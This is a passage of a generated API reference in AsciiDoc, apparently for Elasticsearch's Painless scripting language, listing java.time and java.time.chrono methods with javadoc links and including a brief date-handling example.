{java11-javadoc}/java.base/java/time/OffsetTime.html#plusNanos(long)[plusNanos](long) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#plusSeconds(long)[plusSeconds](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* LocalTime {java11-javadoc}/java.base/java/time/OffsetTime.html#toLocalTime()[toLocalTime]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#truncatedTo(java.time.temporal.TemporalUnit)[truncatedTo](TemporalUnit) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#withHour(int)[withHour](int) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#withMinute(int)[withMinute](int) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#withNano(int)[withNano](int) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#withOffsetSameInstant(java.time.ZoneOffset)[withOffsetSameInstant](ZoneOffset) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#withOffsetSameLocal(java.time.ZoneOffset)[withOffsetSameLocal](ZoneOffset) -* OffsetTime {java11-javadoc}/java.base/java/time/OffsetTime.html#withSecond(int)[withSecond](int) - - -[[painless-api-reference-shared-Period]] -==== Period -* static Period {java11-javadoc}/java.base/java/time/Period.html#ZERO[ZERO] -* static Period {java11-javadoc}/java.base/java/time/Period.html#between(java.time.LocalDate,java.time.LocalDate)[between](LocalDate, LocalDate) -* static Period {java11-javadoc}/java.base/java/time/Period.html#from(java.time.temporal.TemporalAmount)[from](TemporalAmount) -* static Period {java11-javadoc}/java.base/java/time/Period.html#of(int,int,int)[of](int, int, int) -* static Period {java11-javadoc}/java.base/java/time/Period.html#ofDays(int)[ofDays](int) -* static Period {java11-javadoc}/java.base/java/time/Period.html#ofMonths(int)[ofMonths](int) -* static Period {java11-javadoc}/java.base/java/time/Period.html#ofWeeks(int)[ofWeeks](int) -* static Period {java11-javadoc}/java.base/java/time/Period.html#ofYears(int)[ofYears](int) -* static Period {java11-javadoc}/java.base/java/time/Period.html#parse(java.lang.CharSequence)[parse](CharSequence) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#addTo(java.time.temporal.Temporal)[addTo](Temporal) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#get(java.time.temporal.TemporalUnit)[get](TemporalUnit) -* IsoChronology {java11-javadoc}/java.base/java/time/Period.html#getChronology()[getChronology]() -* int {java11-javadoc}/java.base/java/time/Period.html#getDays()[getDays]() -* int {java11-javadoc}/java.base/java/time/Period.html#getMonths()[getMonths]() -* List 
{java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#getUnits()[getUnits]() -* int {java11-javadoc}/java.base/java/time/Period.html#getYears()[getYears]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#isNegative()[isNegative]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#isZero()[isZero]() -* Period {java11-javadoc}/java.base/java/time/Period.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* Period {java11-javadoc}/java.base/java/time/Period.html#minusDays(long)[minusDays](long) -* Period {java11-javadoc}/java.base/java/time/Period.html#minusMonths(long)[minusMonths](long) -* Period {java11-javadoc}/java.base/java/time/Period.html#minusYears(long)[minusYears](long) -* Period {java11-javadoc}/java.base/java/time/Period.html#multipliedBy(int)[multipliedBy](int) -* Period {java11-javadoc}/java.base/java/time/Period.html#negated()[negated]() -* Period {java11-javadoc}/java.base/java/time/Period.html#normalized()[normalized]() -* Period {java11-javadoc}/java.base/java/time/Period.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* Period {java11-javadoc}/java.base/java/time/Period.html#plusDays(long)[plusDays](long) -* Period {java11-javadoc}/java.base/java/time/Period.html#plusMonths(long)[plusMonths](long) -* Period {java11-javadoc}/java.base/java/time/Period.html#plusYears(long)[plusYears](long) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#subtractFrom(java.time.temporal.Temporal)[subtractFrom](Temporal) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#toString()[toString]() -* long {java11-javadoc}/java.base/java/time/Period.html#toTotalMonths()[toTotalMonths]() -* Period {java11-javadoc}/java.base/java/time/Period.html#withDays(int)[withDays](int) -* Period {java11-javadoc}/java.base/java/time/Period.html#withMonths(int)[withMonths](int) -* Period {java11-javadoc}/java.base/java/time/Period.html#withYears(int)[withYears](int) - - -[[painless-api-reference-shared-Year]] -==== Year -* static int {java11-javadoc}/java.base/java/time/Year.html#MAX_VALUE[MAX_VALUE] -* static int {java11-javadoc}/java.base/java/time/Year.html#MIN_VALUE[MIN_VALUE] -* static Year {java11-javadoc}/java.base/java/time/Year.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static boolean {java11-javadoc}/java.base/java/time/Year.html#isLeap(long)[isLeap](long) -* static Year {java11-javadoc}/java.base/java/time/Year.html#of(int)[of](int) -* static Year {java11-javadoc}/java.base/java/time/Year.html#parse(java.lang.CharSequence)[parse](CharSequence) -* static Year {java11-javadoc}/java.base/java/time/Year.html#parse(java.lang.CharSequence,java.time.format.DateTimeFormatter)[parse](CharSequence, DateTimeFormatter) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* LocalDate {java11-javadoc}/java.base/java/time/Year.html#atDay(int)[atDay](int) -* YearMonth {java11-javadoc}/java.base/java/time/Year.html#atMonth(int)[atMonth](int) -* LocalDate {java11-javadoc}/java.base/java/time/Year.html#atMonthDay(java.time.MonthDay)[atMonthDay](MonthDay) -* int {java11-javadoc}/java.base/java/time/Year.html#compareTo(java.time.Year)[compareTo](Year) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null 
{java11-javadoc}/java.base/java/time/Year.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/Year.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/Year.html#isAfter(java.time.Year)[isAfter](Year) -* boolean {java11-javadoc}/java.base/java/time/Year.html#isLeap()[isLeap]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* boolean {java11-javadoc}/java.base/java/time/Year.html#isValidMonthDay(java.time.MonthDay)[isValidMonthDay](MonthDay) -* int {java11-javadoc}/java.base/java/time/Year.html#length()[length]() -* Year {java11-javadoc}/java.base/java/time/Year.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* Year {java11-javadoc}/java.base/java/time/Year.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* Year {java11-javadoc}/java.base/java/time/Year.html#minusYears(long)[minusYears](long) -* Year {java11-javadoc}/java.base/java/time/Year.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* Year {java11-javadoc}/java.base/java/time/Year.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* Year {java11-javadoc}/java.base/java/time/Year.html#plusYears(long)[plusYears](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* Year {java11-javadoc}/java.base/java/time/Year.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* Year {java11-javadoc}/java.base/java/time/Year.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-YearMonth]] -==== YearMonth -* static YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#of(int,int)[of](int, int) -* static YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#parse(java.lang.CharSequence)[parse](CharSequence) -* static YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#parse(java.lang.CharSequence,java.time.format.DateTimeFormatter)[parse](CharSequence, DateTimeFormatter) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* LocalDate {java11-javadoc}/java.base/java/time/YearMonth.html#atDay(int)[atDay](int) -* LocalDate {java11-javadoc}/java.base/java/time/YearMonth.html#atEndOfMonth()[atEndOfMonth]() -* int {java11-javadoc}/java.base/java/time/YearMonth.html#compareTo(java.time.YearMonth)[compareTo](YearMonth) -* 
boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/YearMonth.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* Month {java11-javadoc}/java.base/java/time/YearMonth.html#getMonth()[getMonth]() -* int {java11-javadoc}/java.base/java/time/YearMonth.html#getMonthValue()[getMonthValue]() -* int {java11-javadoc}/java.base/java/time/YearMonth.html#getYear()[getYear]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/YearMonth.html#isAfter(java.time.YearMonth)[isAfter](YearMonth) -* boolean {java11-javadoc}/java.base/java/time/YearMonth.html#isBefore(java.time.YearMonth)[isBefore](YearMonth) -* boolean {java11-javadoc}/java.base/java/time/YearMonth.html#isLeapYear()[isLeapYear]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* boolean {java11-javadoc}/java.base/java/time/YearMonth.html#isValidDay(int)[isValidDay](int) -* int {java11-javadoc}/java.base/java/time/YearMonth.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/YearMonth.html#lengthOfYear()[lengthOfYear]() -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#minusMonths(long)[minusMonths](long) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#minusYears(long)[minusYears](long) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#plusMonths(long)[plusMonths](long) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#plusYears(long)[plusYears](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#withMonth(int)[withMonth](int) -* YearMonth {java11-javadoc}/java.base/java/time/YearMonth.html#withYear(int)[withYear](int) - - -[[painless-api-reference-shared-ZoneId]] -==== ZoneId 
-* static Map {java11-javadoc}/java.base/java/time/ZoneId.html#SHORT_IDS[SHORT_IDS] -* static ZoneId {java11-javadoc}/java.base/java/time/ZoneId.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static Set {java11-javadoc}/java.base/java/time/ZoneId.html#getAvailableZoneIds()[getAvailableZoneIds]() -* static ZoneId {java11-javadoc}/java.base/java/time/ZoneId.html#of(java.lang.String)[of](null) -* static ZoneId {java11-javadoc}/java.base/java/time/ZoneId.html#of(java.lang.String,java.util.Map)[of](null, Map) -* static ZoneId {java11-javadoc}/java.base/java/time/ZoneId.html#ofOffset(java.lang.String,java.time.ZoneOffset)[ofOffset](null, ZoneOffset) -* static ZoneId {java11-javadoc}/java.base/java/time/ZoneId.html#systemDefault()[systemDefault]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/ZoneId.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/ZoneId.html#getId()[getId]() -* ZoneRules {java11-javadoc}/java.base/java/time/ZoneId.html#getRules()[getRules]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* ZoneId {java11-javadoc}/java.base/java/time/ZoneId.html#normalized()[normalized]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneOffset]] -==== ZoneOffset -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#MAX[MAX] -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#MIN[MIN] -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#UTC[UTC] -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#of(java.lang.String)[of](null) -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#ofHours(int)[ofHours](int) -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#ofHoursMinutes(int,int)[ofHoursMinutes](int, int) -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#ofHoursMinutesSeconds(int,int,int)[ofHoursMinutesSeconds](int, int, int) -* static ZoneOffset {java11-javadoc}/java.base/java/time/ZoneOffset.html#ofTotalSeconds(int)[ofTotalSeconds](int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/ZoneId.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/ZoneId.html#getId()[getId]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* ZoneRules {java11-javadoc}/java.base/java/time/ZoneId.html#getRules()[getRules]() -* int {java11-javadoc}/java.base/java/time/ZoneOffset.html#getTotalSeconds()[getTotalSeconds]() -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* ZoneId {java11-javadoc}/java.base/java/time/ZoneId.html#normalized()[normalized]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZonedDateTime]] -==== ZonedDateTime -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#of(java.time.LocalDateTime,java.time.ZoneId)[of](LocalDateTime, ZoneId) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#of(java.time.LocalDate,java.time.LocalTime,java.time.ZoneId)[of](LocalDate, LocalTime, ZoneId) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#of(int,int,int,int,int,int,int,java.time.ZoneId)[of](int, int, int, int, int, int, int, ZoneId) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#ofInstant(java.time.Instant,java.time.ZoneId)[ofInstant](Instant, ZoneId) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#ofInstant(java.time.LocalDateTime,java.time.ZoneOffset,java.time.ZoneId)[ofInstant](LocalDateTime, ZoneOffset, ZoneId) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#ofLocal(java.time.LocalDateTime,java.time.ZoneId,java.time.ZoneOffset)[ofLocal](LocalDateTime, ZoneId, ZoneOffset) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#ofStrict(java.time.LocalDateTime,java.time.ZoneOffset,java.time.ZoneId)[ofStrict](LocalDateTime, ZoneOffset, ZoneId) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#parse(java.lang.CharSequence)[parse](CharSequence) -* static ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#parse(java.lang.CharSequence,java.time.format.DateTimeFormatter)[parse](CharSequence, DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#compareTo(java.time.chrono.ChronoZonedDateTime)[compareTo](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* Chronology {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getChronology()[getChronology]() -* int {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getDayOfMonth()[getDayOfMonth]() -* DayOfWeek {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getDayOfWeek()[getDayOfWeek]() -* int {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getDayOfYear()[getDayOfYear]() -* int {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getHour()[getHour]() -* long 
{java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getMinute()[getMinute]() -* Month {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getMonth()[getMonth]() -* int {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getMonthValue()[getMonthValue]() -* int {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getNano()[getNano]() -* ZoneOffset {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getOffset()[getOffset]() -* int {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getSecond()[getSecond]() -* int {java11-javadoc}/java.base/java/time/ZonedDateTime.html#getYear()[getYear]() -* ZoneId {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getZone()[getZone]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isAfter(java.time.chrono.ChronoZonedDateTime)[isAfter](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isBefore(java.time.chrono.ChronoZonedDateTime)[isBefore](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isEqual(java.time.chrono.ChronoZonedDateTime)[isEqual](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minusDays(long)[minusDays](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minusHours(long)[minusHours](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minusMinutes(long)[minusMinutes](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minusMonths(long)[minusMonths](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minusNanos(long)[minusNanos](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minusSeconds(long)[minusSeconds](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minusWeeks(long)[minusWeeks](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#minusYears(long)[minusYears](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plusDays(long)[plusDays](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plusHours(long)[plusHours](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plusMinutes(long)[plusMinutes](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plusMonths(long)[plusMonths](long) -* ZonedDateTime 
{java11-javadoc}/java.base/java/time/ZonedDateTime.html#plusNanos(long)[plusNanos](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plusSeconds(long)[plusSeconds](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plusWeeks(long)[plusWeeks](long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#plusYears(long)[plusYears](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toEpochSecond()[toEpochSecond]() -* Instant {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toInstant()[toInstant]() -* LocalDate {java11-javadoc}/java.base/java/time/ZonedDateTime.html#toLocalDate()[toLocalDate]() -* LocalDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#toLocalDateTime()[toLocalDateTime]() -* LocalTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalTime()[toLocalTime]() -* OffsetDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#toOffsetDateTime()[toOffsetDateTime]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toString()[toString]() -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#truncatedTo(java.time.temporal.TemporalUnit)[truncatedTo](TemporalUnit) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withDayOfMonth(int)[withDayOfMonth](int) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withDayOfYear(int)[withDayOfYear](int) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withEarlierOffsetAtOverlap()[withEarlierOffsetAtOverlap]() -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withFixedOffsetZone()[withFixedOffsetZone]() -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withHour(int)[withHour](int) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withLaterOffsetAtOverlap()[withLaterOffsetAtOverlap]() -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withMinute(int)[withMinute](int) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withMonth(int)[withMonth](int) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withNano(int)[withNano](int) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withSecond(int)[withSecond](int) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withYear(int)[withYear](int) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withZoneSameInstant(java.time.ZoneId)[withZoneSameInstant](ZoneId) -* ZonedDateTime {java11-javadoc}/java.base/java/time/ZonedDateTime.html#withZoneSameLocal(java.time.ZoneId)[withZoneSameLocal](ZoneId) - - 
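The classes listed above are exposed through the Painless shared API, so their methods can be called directly from a script. As a minimal, illustrative sketch (not part of the generated reference; the timestamp string and zone ID are made-up example values), a script could combine several of the `ZonedDateTime` and `ZoneId` methods listed above:

[source,painless]
----
// Illustrative sketch only; the input values are invented for the example.
ZonedDateTime zdt = ZonedDateTime.parse('2020-01-01T10:15:30+01:00[Europe/Paris]');
ZonedDateTime utc = zdt.withZoneSameInstant(ZoneId.of('UTC'));   // same instant, shifted to UTC
long epochSecond = utc.toEpochSecond();                          // 1577870130
int hourTomorrow = utc.plusDays(1).getHour();                    // 9
----

Every call in this sketch appears in the method lists above, so it should work in any script context that allows the shared API.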
-[role="exclude",id="painless-api-reference-shared-java-time-chrono"] -=== Shared API for package java.time.chrono -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-AbstractChronology]] -==== AbstractChronology -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(int,int,int)[date](int, int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateEpochDay(long)[dateEpochDay](long) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* Era 